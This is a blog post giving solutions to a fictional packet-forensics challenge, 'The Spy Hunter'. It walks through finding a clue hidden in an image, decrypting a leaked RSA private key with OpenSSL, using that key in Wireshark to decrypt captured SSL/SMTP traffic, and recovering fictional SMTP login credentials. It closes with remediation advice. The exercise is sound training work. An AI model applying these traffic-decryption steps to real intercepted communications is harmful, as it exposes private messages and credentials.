HomerHicks’ Twitter page (@HomerHicks) contained a conversation with @UltraVenona.  One of his tweets included a link to Alpha (dl.dropbox.com/…).  Browsing to that link leads us to a file named:

089d615b-4a10-4520-a87b-fd6228c50a14.bmp.

Upon downloading of the file, it looks to be just a white bitmap file. There could be a hidden message in this picture, but how is it hidden? I opened the bitmap in a text editor to take a look at details of the file. Looking at the bitmap file format, it doesn’t look like the image it just plain white. It looks as if there is something else in there.  I then opened the bitmap file with Microsoft Paint. To see if there is hidden text in the image, I use the Paint Bucket tool to fill the background with black. Low and behold there is a link in the image (dl.dropbox.com/…). Browsing to the link leads us to a file named:

bf9de2e9-f9f0-47d2-9630-63228d41fe40-alpha.pem.

Viewing the file in a text editor shows us that this is an encrypted private key file because it has headers describing the type of encryption used and the initialization vector:

—–BEGIN RSA PRIVATE KEY—–
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,06CBE99CA9D5F1534D406E5868FDE302

Bravo:
To find Bravo, we first looked at the spyhunter-irc.pcap that was provided.  This was a packet capture of an unencrypted conversation between HomerHicks and UltraVenona on IRC.  To view the conversation, we need to open the capture file in Wireshark.  Then we will select the first frame in the capture file, right-click, and select “Follow TCP Stream”.  Upon doing so, a window will pop up showing us the entire IRC conversation.  After reading through the conversation, we see that HomerHicks private messaged UltraVenona saying that Bravo is with Stanley at this link, facebook.com/ki….  Browsing to that link leads us to a Facebook page for Kim Philby.  On his Info page, he has a Favorite Quotation that says “@UltraVenona – bravo – hic sunt dracones”.  If we look back to the IRC conversation, we see a message that says to verify Bravo against Alpha.  Since Alpha was an encrypted private key, Bravo may be the password to decrypt it which could be “hic sunt dracones”.  To see if this works, we can use OpenSSL in Linux with the command:
Openssl rsa –in bf9de2e9-f9f0-47d2-9630-63228d41fe40-alpha.pem –out alpha.pem

After running that command, it asks us for a password.  Let’s try and use what Kim Philby had on his Facebook page, “hic sunt dracones”.  It works!  We now have an unencrypted .pem file.  Now what do we use this for?

Charlie:
Going back to HomerHicks’ Twitter page, we see that he made a tweet that said Charlie is at this link: wirewatcher.net….  Browsing to that link says that there is no file at that URL.  Where did Charlie go? To find out more information, let’s start up Wireshark to do a packet capture while browsing to that link. Let’s look at the packet capture now.  The first HTTP packets we see contain a “GET” and an “HTTP/1.0 200 OK” which is when we clicked on the link from Twitter.  The next HTTP packets contain a “GET” and an “HTTP1.1 301 Moved” for the redirect to the actual link.  The last HTTP packet we see is an “HTTP/1.1 404 Not Found”.  This is the error page that we saw on the browser.  Let’s look at this further.  We will right-click on this packet and select “Follow TCP Stream” to view all the packet data associated with this. What’s this? In the headers there is a header field that says “X-Charlie-Location: dl.dropbox.com/…”. Browsing to this link leads us to a file named:

9e6ef492-462a-41cf-88bc-5f692661915e-charlie.pcap

Since this is a .pcap file, let’s open this up in Wireshark to see what it contains.  It looks like SSL encrypted traffic.  If we follow the TCP Stream on the encrypted traffic, all we can see is gibberish. Since Alpha was a .pem private key file, maybe this was the server certificate used with that network traffic.  With Wireshark, we can decrypt SSL traffic if we have the server certificate.  In Wireshark, select “Edit” from the menu bar, then “Preferences”.  Expand “Protocols”, then select “SSL”.  Now there is an option called “RSA keys list”.  This is where we will specify the key.  The format for this field is this:

<server ip>,<port number>,<protocol>,<path to key file>

To find out this information, we will use Wireshark to dig into the packets a little more.  Looking at packet #4, we see that the Info field shows “Client Hello”.  This is the client connecting to the server for the SSL negotiation.  We can see that the destination IP then is “192.168.93.2” which is the server.  If we look at the destination port, we see that it is “465”.  This is the port that is being used.  To find out what protocol is being used, we will click on packet #10, which is the first encrypted “Application Data” packet.  In the middle frame in Wireshark, we will expand the “Secure Socket Layer” field.  We now see that the “Application Data Protocol“ being used is smtp.  We will now put in these values in the SSL preferences section:

192.168.93.2,465,smtp,D:\temp\alpha.pem

After applying the settings, we see that Wireshark has now decrypted the SSL traffic.  We can now right click on packet #10 and select “Follow SSL Stream” to view the decrypted traffic.  Looking at the stream shows that this is a capture of a top secret email message with an image attachment.  To view the image, we need to convert it from base64 back to an image file.  To do this, we need to select packet #639 which is the entire message in Internet Message Format.  In the middle frame after selecting the packet, expand “Internet Message Format”, then expand “MIME Multipart Media Encapsulation”, and then expand “Encapsulated multipart part: (image/png)”.  This is the section of the message which contains the base64 encoded image.  Then right-click on the field named “Portable Network Graphics” and select “Copy”, and then “Bytes (Printable Text Only)”.  We will then paste that into a temporary file named “base64_image.txt”.  Then on a Linux system, we can decode the base64 string by using this command:

cat base64_image.txt | base64 –d >ThatsNoMoon.png

That’s no moon! It’s a space station!! This looks like top secret plans for a massive space station with a weapon that can destroy planets!!

You may fire when ready

Look at the size of that thing!

Remediation

Yellow Sun Industries needs to fix the vulnerability in the space station design that could allow for a strategic shot into a thermal exhaust port which leads to the main reactor.  This would blow up the space station.  They should remove the vent if possible.  If not possible, they should protect the vent with shielding and more laser canons.

Excellent work, Travis! Honourable mentions go to the Penn State IA club for their use of curl to investigate the 404 on the way to recovering Charlie, and to Ben Downton for his remediation suggestions which were:

  • Yellow Sun should examine the backup tape to determine any other information that may be ‘at risk’.
  • Yellow Sun should consult with HR (if they have not done so already) to decide the fate of Donald Burgess. There is likely already grounds for disciplinary proceedings after failing to show up for work and checking out backups unecessarily. Given the results of this investigation there is very likely grounds for firing him and pursuing civil or criminal action.
  • Yellow Sun should disable any of Donald’s accounts and revoke any physical access tokens. It is also recommended that door/lift and other authorisation codes are changed.
  • Yellow Sun should certainly work with law enforcement officers to track down how far the blueprints have leaked and recover them if necessary.
  • It is recommended that budget is immediately set aside to be devoted to pursuing the investigation and preparing for any consequential loss (such as loss of market position, fines imposed etc.)
  • Yellow Sun should consult with the legal/pr departments (if they exist) in order to decide on preparing a statement to be issued to affected parties.

One of the best things about a challenge like this is seeing how people’s approach and suggestions differ from my own. When confronted with the “blank” BMP, I would have followed Travis’ route. Ben’s approach was different:

This bitmap file appeared as a plain white image, visually ‘hidden’ on the page. Extracting this image revealed small variations in the data structure of the image invisible to the naked eye (offset by 1 bit). Opening the image in GIMP and auto correcting the levels revealed a link http://j.mp/aLEdYa

When I was setting the challenge, I gave the image to a friend of mine, an experienced Photoshop jockey. I was hoping his image manipulation skills would help him uncover the clue in about 30 seconds. In the end it took him closer to a minute, but he got the job done. As Infosec pros, it’s helpful for us to remember that skills in “non-security” domains can often help further an investigation – recognise when they’re needed and seek them out. As usual, the “NOKIA” principle applies – No One Knows It All.

Again totally different to Travis and Ben, this was what I had in mind for remediation steps:

  • Patch or replace the installation of VeryVulnerableCMS that allowed Donald Burgess to run tshark.
  • The SSL certificate for mail.yellow.sun is well and truly compromised as the private key has been leaked. Looking at frame 5 from Charlie, we can see a bit more about it:
  • The first thing that is highlighted is the certificate’s serial number – cert 21314 should be revoked and re-issued immediately.
  • The second thing that might draw the eye is the length of time that the certificate is valid for – from 16th August 2009 all the way until 12th March 2016!! Yellow Sun could consider issuing certificates with a shorter lifespan.
  • Next, we look at the decrypted SSL:
  • Yellow Sun make use of SSL-protected authenticated SMTP. However, once you’ve stripped off the SSL, only BASE64 protects the passed credentials. The AUTH LOGIN exchange above reveals this:
    • 334 Username:
    • design@yellow.sun
    • 334 Password:
    • password123
  • The credentials above are therefore compromised, and should be changed. Also, Yellow Sun employees should be encouraged to make more of an effort when choosing passwords…
  • Lastly, and there’s no proof of this, but Yellow Sun might like to take a look at their personnel files. I strongly doubt that Philby approached Burgess at FIA totally at random. Perhaps there’s someone else inside Yellow Sun who marked Burgess for Philby’s attention? Could there still be a mole inside Yellow Sun?

The Penn State IA club produced a nice timeline, which you can see here. I also had a play with creating an interactive timeline of events; I can’t embed it directly into this post, but click the image to take a look:

Finally, don’t I know you from somewhere?

As Travis alluded to, I’ve not been entirely original in my selection of the characters’ names. Here’s where my inspiration came from:

  • HomerHicks/Donald Burgess is indeed a composite of Donald Maclean and Guy Burgess (codenamed Homer and Hicks respectively), two members of the Cambridge Five.
  • Kim Philby (codenamed Stanley) was another member of the Cambridge Five.
  • UltraVenona is a composite of Ultra (the codename given to intercepted Enigma traffic during WW2) and Venona (the codename given to intercepted Soviet traffic during the Cold War).
  • Yellow Sun was a British free fall nuclear weapon of the Cold War.
  • The briefing document said that the investigation of Donald Burgess was codenamed Operation FOOT. The real FOOT was the mass expulsion from the United Kingdom of Soviet diplomats and trade delegation officials in 1971 (more here (bottom of page) and here).
  • Finally, Yellow Sun’s Keith Tarkin shares his name with the other Mr Tarkin who is also in possession of something that definitely isn’t a moon.

That’s all for now, folks. However, I doubt we’ve seen the last of Donald Burgess and associates!

Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Packet Challenge – The Spy Hunter

Posted in Packet Challenge, Spy Hunter on 23 August, 2010 by Alec Waters

I’ve concocted another packet challenge for you to try, entitled “The Spy Hunter”. This one’s a little different in that solving the technical challenge is only part of the solution – you’re going to have to conduct an investigation along the way, too. Maintain vigilance to detail and keep notes, and you’ll uncover all the secrets.

There’s a prize of a $15.00 Starbucks or iTunes card up for grabs for the writer of the best entry.

The challenge is posted over at ismellpackets.com; many thanks to Chris Christianson for giving it a home and putting up the prize.

Good luck, and have fun!


Alec Waters is responsible for all things security at Dataline Software, and can be emailed at alec.waters@dataline.co.uk

Follow

Get every new post delivered to your Inbox.

Join 28 other followers